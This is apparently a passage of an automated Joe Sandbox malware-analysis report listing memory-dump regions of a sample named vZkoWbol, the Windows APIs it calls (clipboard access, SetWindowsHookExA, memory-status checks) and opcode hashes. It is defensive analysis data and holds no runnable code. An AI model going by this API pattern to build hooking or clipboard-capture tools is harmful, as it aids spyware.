                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard
                                                                    • String ID:
                                                                    • API String ID: 220874293-0
                                                                    • Opcode ID: a483ab17b289439bc88da919d20b7b7e6b817281adf555d675b1ff32ae1393a5
                                                                    • Instruction ID: bc605f5a790570bd0fa7ab2f6ba34919543f78c5a5210d30ec6c3a05d6dd50f5
                                                                    • Opcode Fuzzy Hash: a483ab17b289439bc88da919d20b7b7e6b817281adf555d675b1ff32ae1393a5
                                                                    • Instruction Fuzzy Hash: 7A3102B0D02249DFDB54DF99C984BDEBBF5AF48304F248029E404BB390D774A945CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06D46377
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: ea2709ede612dd52954490a288a00eb48dd298e21d6269ca4f29ce33f7e1995d
                                                                    • Instruction ID: 16565629bc3eb4524902bf902cf8a35d80706f0f813ae8c90dd642e684c52f65
                                                                    • Opcode Fuzzy Hash: ea2709ede612dd52954490a288a00eb48dd298e21d6269ca4f29ce33f7e1995d
                                                                    • Instruction Fuzzy Hash: ED21E6B5D002489FDB10DFAAD584ADEBFF4FB49310F14805AE955A3350D378A950CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06D46377
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: d1d48460503806d4b7ed591f92cf572a065ca651af49ff24a28d113cba74db4b
                                                                    • Instruction ID: 27ec301e8658190cac5b0f9f8833bb300010555cace1905ab12b4184c12e2e6c
                                                                    • Opcode Fuzzy Hash: d1d48460503806d4b7ed591f92cf572a065ca651af49ff24a28d113cba74db4b
                                                                    • Instruction Fuzzy Hash: 7221E2B59002489FDB10CFAAD984ADEBBF8FB48310F14801AE958A3350D378A950CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06D49A8B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: HookWindows
                                                                    • String ID:
                                                                    • API String ID: 2559412058-0
                                                                    • Opcode ID: 338b9c167a3d026cf4cbc52646b2961d9ad64000c143e1c904cc27b10ae31c5c
                                                                    • Instruction ID: 6ab58f90caf5cdc2ffb5de65565356f89604afc11228034f41ccaa5947082c6a
                                                                    • Opcode Fuzzy Hash: 338b9c167a3d026cf4cbc52646b2961d9ad64000c143e1c904cc27b10ae31c5c
                                                                    • Instruction Fuzzy Hash: 472102B5D002099FCB14DF9AD845BEEBBF5EF88310F14842AE458A7250C774A940CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06D49A8B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: HookWindows
                                                                    • String ID:
                                                                    • API String ID: 2559412058-0
                                                                    • Opcode ID: d74a07a063b0973291e1fde4841e5a346da843d4956e1e7e6fddd67c793023c0
                                                                    • Instruction ID: 953da4c1a43fe12844362aa57ecbf3c5da354e4899a6ef9b573b08adf4588587
                                                                    • Opcode Fuzzy Hash: d74a07a063b0973291e1fde4841e5a346da843d4956e1e7e6fddd67c793023c0
                                                                    • Instruction Fuzzy Hash: 6B210FB5D002099FCB14DF9AC845BEEBBF5EF88310F14842AE458A7250C778A940CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GlobalMemoryStatusEx.KERNELBASE ref: 013DEAC7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4524828442.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_13d0000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemoryStatus
                                                                    • String ID:
                                                                    • API String ID: 1890195054-0
                                                                    • Opcode ID: e6ead6f921c126603cb758e33321ea464805ceb5b807e041a99ed8aebc6b1e5b
                                                                    • Instruction ID: c29667756dd7da26ec985d44bbc4b7559da48ab176adff54ccc13144ada0d3c2
                                                                    • Opcode Fuzzy Hash: e6ead6f921c126603cb758e33321ea464805ceb5b807e041a99ed8aebc6b1e5b
                                                                    • Instruction Fuzzy Hash: 9F111FB2C0065A9BDB10DF9AD444ADEFBF4FF48320F14816AE818A7240D378A944CFE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 06D41556
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 67a6f4e8aedfece365cbc99683c68e2145bc139eff4df7af9ee9a05f5373657b
                                                                    • Instruction ID: c494575e8da92e9af216c14228e24230376968411702f81aa17092ae212f50e0
                                                                    • Opcode Fuzzy Hash: 67a6f4e8aedfece365cbc99683c68e2145bc139eff4df7af9ee9a05f5373657b
                                                                    • Instruction Fuzzy Hash: 651113B6C002498FDB10DF9AD844AEEFBF8EF49320F10841AD429B7210D379A585CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 06D41556
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: a7313063fd006fcaf2797c30f785ede56b2484dbc33cec392e99c8f01363eaa3
                                                                    • Instruction ID: ab6749c8eb02eb85603ba0beeb36698fce3862530c1e30c98b5b55a3f7ed708e
                                                                    • Opcode Fuzzy Hash: a7313063fd006fcaf2797c30f785ede56b2484dbc33cec392e99c8f01363eaa3
                                                                    • Instruction Fuzzy Hash: A111E0B6C002498FDB10DF9AD844AEEFBF4EF89310F14845AD469B7610D379A585CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • OleInitialize.OLE32(00000000), ref: 06D47DDD
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize
                                                                    • String ID:
                                                                    • API String ID: 2538663250-0
                                                                    • Opcode ID: 03fcc6dbb301e84d1fc757ac267b3956391d9ce4bd09d5909f2e9e296eecea2e
                                                                    • Instruction ID: 7d045355eda5131aa610d40119c36e99da8d25096d6e27451393128395bd03c0
                                                                    • Opcode Fuzzy Hash: 03fcc6dbb301e84d1fc757ac267b3956391d9ce4bd09d5909f2e9e296eecea2e
                                                                    • Instruction Fuzzy Hash: 851115B1810388CFDB20EF9AD445BDEBBF4EB48310F208459D558A7300D378A944CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06D47495), ref: 06D4751F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: 084797330788fd91e790fe720340614ba76c3c0234d95da958c2259fcd6d952c
                                                                    • Instruction ID: 9a814c15847491ca602d83e3a02b2f9280ae54559d4e3619db385f56b55bbcc2
                                                                    • Opcode Fuzzy Hash: 084797330788fd91e790fe720340614ba76c3c0234d95da958c2259fcd6d952c
                                                                    • Instruction Fuzzy Hash: E71103B18002498FDB50EF9AD448BEEBBF8EB48324F20845AD559A7250D378A944CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06D47495), ref: 06D4751F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: 5affffc7d82bf310e0cc1fdc4ed5f16a441035bc76f70af103313b279213d3ad
                                                                    • Instruction ID: 12ccc92923b2da616e7df450d3a95ddf6a97d8428564cb663af79ec67acc8182
                                                                    • Opcode Fuzzy Hash: 5affffc7d82bf310e0cc1fdc4ed5f16a441035bc76f70af103313b279213d3ad
                                                                    • Instruction Fuzzy Hash: 0C1103B58002498FDB20DF9AD844BDEBBF4EB48310F20845AD519A7350D379A944CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • OleInitialize.OLE32(00000000), ref: 06D47DDD
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize
                                                                    • String ID:
                                                                    • API String ID: 2538663250-0
                                                                    • Opcode ID: 7521797c5a8e756f6fe281d11a3ba36a965e4c08dffc35627285a0c9a8d07a56
                                                                    • Instruction ID: eba1bfec3ca2b421867cb9f38f71b6cd19d5cb64ce0bc93cfed2cbc72c7804ae
                                                                    • Opcode Fuzzy Hash: 7521797c5a8e756f6fe281d11a3ba36a965e4c08dffc35627285a0c9a8d07a56
                                                                    • Instruction Fuzzy Hash: D01115B19002498FDB20DF9AD448BDEBFF4EB48314F20845AE558A3240D378AA44CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PH]q
                                                                    • API String ID: 0-3168235125
                                                                    • Opcode ID: 325a8ac5682d8ac6ba1c9ca5a40ae44d6ad07199699f6638c5d6ec046787429c
                                                                    • Instruction ID: 9d1d32b03a20701153c23db9aa359a5c12bc6855685ee40393a596c2c2267abc
                                                                    • Opcode Fuzzy Hash: 325a8ac5682d8ac6ba1c9ca5a40ae44d6ad07199699f6638c5d6ec046787429c
                                                                    • Instruction Fuzzy Hash: 9A418F30E0030A9FDF54DF65D4506AEBBB7EF85300F214429E805EB644EB75D946CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PH]q
                                                                    • API String ID: 0-3168235125
                                                                    • Opcode ID: bfa68a07af9dbbbd53b028f225abbf8e9bd9c533bc186188e7877f11d1033db9
                                                                    • Instruction ID: fc6d54616a29182dbc8913bbc4cea66399b5e523e9520841ce2cedaa8afc34d1
                                                                    • Opcode Fuzzy Hash: bfa68a07af9dbbbd53b028f225abbf8e9bd9c533bc186188e7877f11d1033db9
                                                                    • Instruction Fuzzy Hash: F231DE30B002018FDF689B74D56066E7BE6AFC9714F218438D806DB384DE39DD4ACB95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q
                                                                    • API String ID: 0-1007455737
                                                                    • Opcode ID: a4986b0f2f832c7402ae2c3d915b537f34edc2306285b6554a8c4ed7390d430f
                                                                    • Instruction ID: e51c438c2a96f0be56994a172d09bf8c7b4f8cf8e6dfe03707d581c3b6727aa9
                                                                    • Opcode Fuzzy Hash: a4986b0f2f832c7402ae2c3d915b537f34edc2306285b6554a8c4ed7390d430f
                                                                    • Instruction Fuzzy Hash: BFF0ED36B04229CFFFA44F86E8801ACB3B4EB802A2F170062CD02D7950DA34CE46EB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ec6c62a61f0e9920c7944a062658f8649c7f3801713e269492d6951515e871cb
                                                                    • Instruction ID: 6938688520bc495fd680d486106f840f22b8619305601e3a54be51b0b9f477b4
                                                                    • Opcode Fuzzy Hash: ec6c62a61f0e9920c7944a062658f8649c7f3801713e269492d6951515e871cb
                                                                    • Instruction Fuzzy Hash: E661AF71F000114FDF649B7AC88066FBADBAFD4224B554479D80EDB360DE69DD0287D2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0fb31295e61fe28fe178141dc919899eb16ab19838c8428b3e6bc8f74188cbee
                                                                    • Instruction ID: bcaf919d168e3087799eb4e8499cf42b5c6dbe767baca740fae2255982bc05f3
                                                                    • Opcode Fuzzy Hash: 0fb31295e61fe28fe178141dc919899eb16ab19838c8428b3e6bc8f74188cbee
                                                                    • Instruction Fuzzy Hash: 28813D30B0020A9BDF44DFA9D4546AEB7F2EF89304F118428D80ADB794DB74DC868B82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 49366cf537378c2d4ffe7cc2f4d89ef6d8693bc9daac714c88fe1a217b4623ca
                                                                    • Instruction ID: 0365c352fee84c6a9c1c887659b1e44bbebcfce754ffae0a4aa1b93ec1e9483e
                                                                    • Opcode Fuzzy Hash: 49366cf537378c2d4ffe7cc2f4d89ef6d8693bc9daac714c88fe1a217b4623ca
                                                                    • Instruction Fuzzy Hash: B1914E30E0021A8BDF64DF68C890BDDB7B1FF89304F208599D54DAB255DB74AA86CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a02ba20e4ccd67a90bb1dac8c49c694972a5cea47c271a2b0a44e6399809995c
                                                                    • Instruction ID: 74af2480d4cff4865d823c4fee132ecb0e52c705d5e3cc76edf04057c486d450
                                                                    • Opcode Fuzzy Hash: a02ba20e4ccd67a90bb1dac8c49c694972a5cea47c271a2b0a44e6399809995c
                                                                    • Instruction Fuzzy Hash: 58715F30E1031A8FCF54DFA9D4906AEB7B6FF85304F11862AE809AB754DB74D846CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6c25b363a260ab576ef9227dc67e9f06904d9e26bf99854a5fcbc85871da43b5
                                                                    • Instruction ID: b8a5b5a852989df5fa88571f431ead6060c3611b0f093be39afaf1ab0ff4231a
                                                                    • Opcode Fuzzy Hash: 6c25b363a260ab576ef9227dc67e9f06904d9e26bf99854a5fcbc85871da43b5
                                                                    • Instruction Fuzzy Hash: 5E913D30E1021A8BDF64DF68C890BDDB7B1FF89304F208699D54DAB254DB70AA85CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: aec1391c1353ef6f4493cfe80b3aafb4d98b925a9d49d2951d962bb5fe6145dd
                                                                    • Instruction ID: 2928ff792f23019f2864af024beb7b36e9ba4f9de10c5ddb107383e16b6deca8
                                                                    • Opcode Fuzzy Hash: aec1391c1353ef6f4493cfe80b3aafb4d98b925a9d49d2951d962bb5fe6145dd
                                                                    • Instruction Fuzzy Hash: 0F714C30A002099FDB54EFA9D980AADBBF6FF84304F25852AD415EB764DB34ED46CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b8467be28e4665f127681bf1b049c796dee79ba1283c2b99a9e282ced7586d5b
                                                                    • Instruction ID: a1b007e65c7abb3766241af7dc6ccbd630b46082dbca6a7822364ba40473843e
                                                                    • Opcode Fuzzy Hash: b8467be28e4665f127681bf1b049c796dee79ba1283c2b99a9e282ced7586d5b
                                                                    • Instruction Fuzzy Hash: F8713E30A002099FDB54EFA9D980A9DBBF6FF84304F258429D415EB764DB34ED46CB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 15855dfa3d450321f17efbd34509925256663a3f32eb2ebc63e3687069bb3229
                                                                    • Instruction ID: bcf6d8278a31c7b3126041e6826cdf31f85eb20aa9584558fbda57752708e9ab
                                                                    • Opcode Fuzzy Hash: 15855dfa3d450321f17efbd34509925256663a3f32eb2ebc63e3687069bb3229
                                                                    • Instruction Fuzzy Hash: 34510531E00209DFCF54ABB8E4986ADB7B2FB84315F11487AE906DF650DB358845CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 48fde09a76c315060c7bc2b5fccd72f963c128f4f27629e1600be3215cb5b734
                                                                    • Instruction ID: d010de5ee8786515133f57d6e6b7865bfc4d3b40741e1e109f470477e8e646c7
                                                                    • Opcode Fuzzy Hash: 48fde09a76c315060c7bc2b5fccd72f963c128f4f27629e1600be3215cb5b734
                                                                    • Instruction Fuzzy Hash: C451C7B0B102049FEF605B7DE954B6F265FEB89710F11483AE80EDB795C92CCC558BA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f8b1e45885483bc82892601832ec8e749458e615b786777d4c591b20062b8a38
                                                                    • Instruction ID: 3a3250ac235c26a33b3283aad3fd752074980ab6bf08766ba6d1da0fc6502d15
                                                                    • Opcode Fuzzy Hash: f8b1e45885483bc82892601832ec8e749458e615b786777d4c591b20062b8a38
                                                                    • Instruction Fuzzy Hash: 3D51D8B0B10204DBEF645B7DE954B2F265FEB89710F21483AD80EDB795C92CCC458B92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 08baf74f88391d91b227a706e3727b4a8942424f101d026e8fa50ea4d18f7c6b
                                                                    • Instruction ID: 7c3f1708c6fea3eb52d90d03aaa4f0d5a90ee65bac7b9232cb04695816536df2
                                                                    • Opcode Fuzzy Hash: 08baf74f88391d91b227a706e3727b4a8942424f101d026e8fa50ea4d18f7c6b
                                                                    • Instruction Fuzzy Hash: 2E417171E006098FCF71CFA9E8C0ABFB7B2EB48310F11492AD51AD7A50D731E9558B91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d166c46551adf11b83b311c9bb41aa88b6527b4c62a314da7cea6a1ad8674830
                                                                    • Instruction ID: 88de3a616c2f811cefa510d51c9c972f51d2a316bb38b6cf755907fb64e92aaa
                                                                    • Opcode Fuzzy Hash: d166c46551adf11b83b311c9bb41aa88b6527b4c62a314da7cea6a1ad8674830
                                                                    • Instruction Fuzzy Hash: 5C316130E0020A9FCF59CF65D894A9EB7B2EF89310F118529E906E7750DB75AD46CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 52dbdafe8a86b6c3a258a82aad04c17d1fd231e822b8b41e955fac96fadb48c5
                                                                    • Instruction ID: 98fb5c28b0d3e2db2d47ee3291da6440d25f62abb6fd47a06aeb882c9a7e2eb9
                                                                    • Opcode Fuzzy Hash: 52dbdafe8a86b6c3a258a82aad04c17d1fd231e822b8b41e955fac96fadb48c5
                                                                    • Instruction Fuzzy Hash: 2F318030E0020A9FCF59CF65D854A9EB7B2EF89310F11C529E906E7750DB75AD46CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3ca4a5b9b140e667ee6cd44cc8e9968715f0e1f6d7ea3f7a782cb442a1f95d39
                                                                    • Instruction ID: 1260c4fcd65491a8262a817d019c09dcfb654d5c37a05617c05618e57b9ff4c2
                                                                    • Opcode Fuzzy Hash: 3ca4a5b9b140e667ee6cd44cc8e9968715f0e1f6d7ea3f7a782cb442a1f95d39
                                                                    • Instruction Fuzzy Hash: 99219C75F002059FDF00DFA9D880AAEBBF2EB88790F028025E909E7350EB35DD418B91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ed6d212077df94f75e54917095b9840c0e2c0612f889f201d800a3e98b87ddbb
                                                                    • Instruction ID: 18f44d012cd8850ff05177647cea1c9798265142dcf65ef6734737a6c981d2a6
                                                                    • Opcode Fuzzy Hash: ed6d212077df94f75e54917095b9840c0e2c0612f889f201d800a3e98b87ddbb
                                                                    • Instruction Fuzzy Hash: 91219C75F006059FDF50DFA9D880AAEB7F1EB48650F128025E909E7340EB35DD418B95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4524608361.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_134d000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
